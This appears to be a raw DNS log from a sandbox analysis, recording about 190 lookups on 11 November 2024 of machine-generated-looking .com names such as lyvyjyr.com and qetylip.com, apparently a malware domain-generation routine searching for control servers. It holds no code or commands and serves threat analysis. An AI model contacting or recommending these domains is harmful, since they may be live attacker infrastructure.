                                                                                                                                                                                                            Nov 11, 2024 18:08:19.572781086 CET192.168.2.91.1.1.10xc3b9Standard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.572977066 CET192.168.2.91.1.1.10xcc51Standard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.573133945 CET192.168.2.91.1.1.10xb1cbStandard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.573292971 CET192.168.2.91.1.1.10xde98Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.573435068 CET192.168.2.91.1.1.10x7f5aStandard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.573580980 CET192.168.2.91.1.1.10xd6c2Standard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.576060057 CET192.168.2.91.1.1.10xeeb9Standard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.576502085 CET192.168.2.91.1.1.10x6ae7Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.576894045 CET192.168.2.91.1.1.10xba82Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.577239990 CET192.168.2.91.1.1.10x31ceStandard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.577557087 CET192.168.2.91.1.1.10xc4e7Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.577949047 CET192.168.2.91.1.1.10x6d8aStandard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.579557896 CET192.168.2.91.1.1.10x66b4Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.615468025 CET192.168.2.91.1.1.10x8473Standard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.615813971 CET192.168.2.91.1.1.10x14c8Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.623722076 CET192.168.2.91.1.1.10x2b33Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.624208927 CET192.168.2.91.1.1.10x3e8eStandard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.628638029 CET192.168.2.91.1.1.10xd493Standard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.633153915 CET192.168.2.91.1.1.10xb9f2Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.740123987 CET192.168.2.91.1.1.10x6fefStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.741447926 CET192.168.2.91.1.1.10x5251Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.742800951 CET192.168.2.91.1.1.10x6234Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.745575905 CET192.168.2.91.1.1.10x968Standard query (0)puzylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.746650934 CET192.168.2.91.1.1.10x6cbbStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.753267050 CET192.168.2.91.1.1.10xc4f5Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.758997917 CET192.168.2.91.1.1.10xdb8Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.762126923 CET192.168.2.91.1.1.10x802cStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.763103962 CET192.168.2.91.1.1.10xbeecStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.806852102 CET192.168.2.91.1.1.10xa20cStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.705341101 CET192.168.2.91.1.1.10xd8efStandard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.707340956 CET192.168.2.91.1.1.10x2e69Standard query (0)vojypat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.820516109 CET192.168.2.91.1.1.10x6aabStandard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.821161032 CET192.168.2.91.1.1.10x39f1Standard query (0)qetykyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.922379971 CET192.168.2.91.1.1.10x1468Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.124272108 CET192.168.2.91.1.1.10xd7c3Standard query (0)lyryjej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.124708891 CET192.168.2.91.1.1.10xa60Standard query (0)vocybuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.180497885 CET192.168.2.91.1.1.10xe9baStandard query (0)gahypoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.180907011 CET192.168.2.91.1.1.10xdeebStandard query (0)qebyniv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.230173111 CET192.168.2.91.1.1.10x7837Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.349726915 CET192.168.2.91.1.1.10x8cffStandard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.438003063 CET192.168.2.91.1.1.10x5aafStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.545759916 CET192.168.2.91.1.1.10x7be0Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.545979977 CET192.168.2.91.1.1.10x7f1cStandard query (0)gadyniw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.546336889 CET192.168.2.91.1.1.10x98d6Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.573477030 CET192.168.2.91.1.1.10xe1b0Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.573939085 CET192.168.2.91.1.1.10x2ef2Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.574230909 CET192.168.2.91.1.1.10xc483Standard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.574302912 CET192.168.2.91.1.1.10xefaStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.574619055 CET192.168.2.91.1.1.10x932dStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.575016022 CET192.168.2.91.1.1.10x744cStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.575429916 CET192.168.2.91.1.1.10x8ce3Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.575617075 CET192.168.2.91.1.1.10x642bStandard query (0)puryjeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.575783014 CET192.168.2.91.1.1.10xec29Standard query (0)pujycyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.594578028 CET192.168.2.91.1.1.10xb721Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.594815969 CET192.168.2.91.1.1.10x8a22Standard query (0)qebyhag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.594965935 CET192.168.2.91.1.1.10x4153Standard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.595133066 CET192.168.2.91.1.1.10x19d5Standard query (0)gahyces.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.595520020 CET192.168.2.91.1.1.10x520fStandard query (0)lyvygon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.596231937 CET192.168.2.91.1.1.10xddaaStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.596426964 CET192.168.2.91.1.1.10x889eStandard query (0)qekysel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.596595049 CET192.168.2.91.1.1.10x1353Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.596775055 CET192.168.2.91.1.1.10xa008Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.596967936 CET192.168.2.91.1.1.10x85eaStandard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.597125053 CET192.168.2.91.1.1.10x8ba9Standard query (0)vopyrik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.597301006 CET192.168.2.91.1.1.10x4b68Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.598933935 CET192.168.2.91.1.1.10x976bStandard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.656924963 CET192.168.2.91.1.1.10xbcf2Standard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.657125950 CET192.168.2.91.1.1.10x8222Standard query (0)lyrywur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.657336950 CET192.168.2.91.1.1.10x68e7Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.657356024 CET192.168.2.91.1.1.10xbc80Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.657522917 CET192.168.2.91.1.1.10xaf44Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.657871008 CET192.168.2.91.1.1.10xb50aStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.658889055 CET192.168.2.91.1.1.10x7367Standard query (0)purywyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.660176992 CET192.168.2.91.1.1.10x1c0fStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.702764988 CET192.168.2.91.1.1.10x8b06Standard query (0)puvygog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.703350067 CET192.168.2.91.1.1.10xf949Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.703572035 CET192.168.2.91.1.1.10x14acStandard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.703754902 CET192.168.2.91.1.1.10xcbaaStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.709947109 CET192.168.2.91.1.1.10xda75Standard query (0)gatyruw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.710558891 CET192.168.2.91.1.1.10x3bbaStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.710720062 CET192.168.2.91.1.1.10x28bStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.711330891 CET192.168.2.91.1.1.10xd569Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.711437941 CET192.168.2.91.1.1.10xfe96Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.712539911 CET192.168.2.91.1.1.10xc206Standard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.729547977 CET192.168.2.91.1.1.10x171aStandard query (0)qegytop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.731234074 CET192.168.2.91.1.1.10x6a2fStandard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.731630087 CET192.168.2.91.1.1.10x988cStandard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.731982946 CET192.168.2.91.1.1.10x8832Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.732536077 CET192.168.2.91.1.1.10x91eeStandard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.732942104 CET192.168.2.91.1.1.10x7837Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733248949 CET192.168.2.91.1.1.10xded2Standard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733364105 CET192.168.2.91.1.1.10x7e50Standard query (0)qetyrul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733688116 CET192.168.2.91.1.1.10x8564Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.733845949 CET192.168.2.91.1.1.10xd71bStandard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.734039068 CET192.168.2.91.1.1.10xcd86Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:23.734245062 CET192.168.2.91.1.1.10x199fStandard query (0)vonymoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.005901098 CET192.168.2.91.1.1.10x1c52Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.039340019 CET192.168.2.91.1.1.10x6c89Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.046766043 CET192.168.2.91.1.1.10x9b14Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.048217058 CET192.168.2.91.1.1.10x425eStandard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.050357103 CET192.168.2.91.1.1.10xe61Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.052325010 CET192.168.2.91.1.1.10x1883Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.055836916 CET192.168.2.91.1.1.10x1b9Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.056361914 CET192.168.2.91.1.1.10x618Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.169022083 CET192.168.2.91.1.1.10x3f0fStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.348836899 CET192.168.2.91.1.1.10x717cStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.591252089 CET192.168.2.91.1.1.10x9bf7Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.740487099 CET192.168.2.91.1.1.10x1582Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.900892973 CET192.168.2.91.1.1.10x731eStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.901340961 CET192.168.2.91.1.1.10x3b8bStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.901546001 CET192.168.2.91.1.1.10xa8aStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.903089046 CET192.168.2.91.1.1.10x8531Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:24.912940025 CET192.168.2.91.1.1.10xffbbStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.063950062 CET192.168.2.91.1.1.10x7952Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.064405918 CET192.168.2.91.1.1.10x4690Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.122569084 CET192.168.2.91.1.1.10xb36bStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.132385969 CET192.168.2.91.1.1.10x2754Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.134188890 CET192.168.2.91.1.1.10x10e7Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.136334896 CET192.168.2.91.1.1.10x96c6Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.137669086 CET192.168.2.91.1.1.10xf3b5Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.144802094 CET192.168.2.91.1.1.10x1bcdStandard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.155134916 CET192.168.2.91.1.1.10xa189Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.180301905 CET192.168.2.91.1.1.10x272aStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.183442116 CET192.168.2.91.1.1.10x1ebbStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.187263966 CET192.168.2.91.1.1.10x65dcStandard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.211525917 CET192.168.2.91.1.1.10x798cStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.248749018 CET192.168.2.91.1.1.10x3189Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.277580023 CET192.168.2.91.1.1.10xea60Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.285957098 CET192.168.2.91.1.1.10xaf62Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.299024105 CET192.168.2.91.1.1.10xde20Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.299221039 CET192.168.2.91.1.1.10x171bStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.347852945 CET192.168.2.91.1.1.10xaa51Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.392606020 CET192.168.2.91.1.1.10x987eStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.392880917 CET192.168.2.91.1.1.10xf035Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.396352053 CET192.168.2.91.1.1.10x8c28Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.460561037 CET192.168.2.91.1.1.10x80dbStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.560158968 CET192.168.2.91.1.1.10xb0d4Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.753179073 CET192.168.2.91.1.1.10x2e47Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.468717098 CET192.168.2.91.1.1.10x7022Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.478286028 CET192.168.2.91.1.1.10x3ba7Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.493372917 CET192.168.2.91.1.1.10x2700Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.721008062 CET192.168.2.91.1.1.10x3e84Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.737608910 CET192.168.2.91.1.1.10xcdeaStandard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.042829990 CET192.168.2.91.1.1.10xb9e9Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.218015909 CET192.168.2.91.1.1.10xe9dcStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.394659996 CET192.168.2.91.1.1.10x3a03Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.402087927 CET192.168.2.91.1.1.10x7f22Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.405694008 CET192.168.2.91.1.1.10x502cStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.408781052 CET192.168.2.91.1.1.10xe9bbStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.409430981 CET192.168.2.91.1.1.10x5806Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.411514044 CET192.168.2.91.1.1.10xa964Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.423717976 CET192.168.2.91.1.1.10xe338Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.438628912 CET192.168.2.91.1.1.10x6dffStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.440996885 CET192.168.2.91.1.1.10xdc65Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.444607019 CET192.168.2.91.1.1.10xa356Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.446527004 CET192.168.2.91.1.1.10x2070Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.447623968 CET192.168.2.91.1.1.10xa142Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.450499058 CET192.168.2.91.1.1.10x3a5fStandard query (0)lymygor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.451061964 CET192.168.2.91.1.1.10xcb7Standard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.451955080 CET192.168.2.91.1.1.10x408fStandard query (0)gadyrus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.470096111 CET192.168.2.91.1.1.10x85a5Standard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.470737934 CET192.168.2.91.1.1.10xb7fcStandard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.482927084 CET192.168.2.91.1.1.10xeca7Standard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.483783960 CET192.168.2.91.1.1.10xd15fStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.483939886 CET192.168.2.91.1.1.10xd241Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.484088898 CET192.168.2.91.1.1.10xef35Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.484653950 CET192.168.2.91.1.1.10x17d9Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.484839916 CET192.168.2.91.1.1.10xd21cStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.485023022 CET192.168.2.91.1.1.10x38dStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.485724926 CET192.168.2.91.1.1.10xed57Standard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.515362024 CET192.168.2.91.1.1.10x9f69Standard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.612653971 CET192.168.2.91.1.1.10x27ddStandard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.615792990 CET192.168.2.91.1.1.10x5d7dStandard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.616230011 CET192.168.2.91.1.1.10x65aStandard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.616564035 CET192.168.2.91.1.1.10x5976Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.616998911 CET192.168.2.91.1.1.10x6e3eStandard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.617306948 CET192.168.2.91.1.1.10x7c90Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.617685080 CET192.168.2.91.1.1.10xf2eaStandard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.618078947 CET192.168.2.91.1.1.10x974dStandard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.618278980 CET192.168.2.91.1.1.10xe520Standard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.618588924 CET192.168.2.91.1.1.10xc76dStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.618916035 CET192.168.2.91.1.1.10x959fStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.619462013 CET192.168.2.91.1.1.10x2458Standard query (0)purymog.comA (IP address)IN (0x0001)false
